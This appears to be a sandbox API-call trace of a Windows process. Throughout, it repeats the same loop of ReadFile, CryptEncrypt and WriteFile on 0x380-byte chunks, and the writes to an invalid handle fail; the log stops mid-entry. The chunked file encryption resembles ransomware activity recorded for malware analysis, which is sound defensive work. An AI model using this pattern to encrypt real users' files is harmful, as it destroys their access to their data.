[0231.917] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.917] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.917] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.917] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.917] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.917] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.917] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.917] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.917] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.917] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.917] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.918] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.918] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.918] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.918] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.918] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.918] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.918] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.918] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.918] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.918] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.918] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.918] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.918] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.918] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.918] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.918] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.918] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.918] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.918] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.918] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.919] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.919] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.919] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.919] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.919] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.919] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.919] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.919] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.919] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.919] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.919] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.919] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.919] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.919] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.919] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.919] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.919] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.920] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.920] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.920] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.920] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.920] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.920] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.920] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.920] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.920] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.920] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.920] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.920] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.920] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.920] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.920] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.921] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.921] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.921] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.921] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.921] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.921] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.921] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.921] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.921] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.921] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.921] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.921] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.921] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.921] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.921] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.921] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.921] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.921] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.921] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.922] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.922] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.922] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.922] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.922] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.922] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.922] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.922] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.922] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.922] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.922] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.922] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.922] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.922] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.922] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.922] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.922] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.922] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.922] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.922] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.923] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.923] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.923] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, 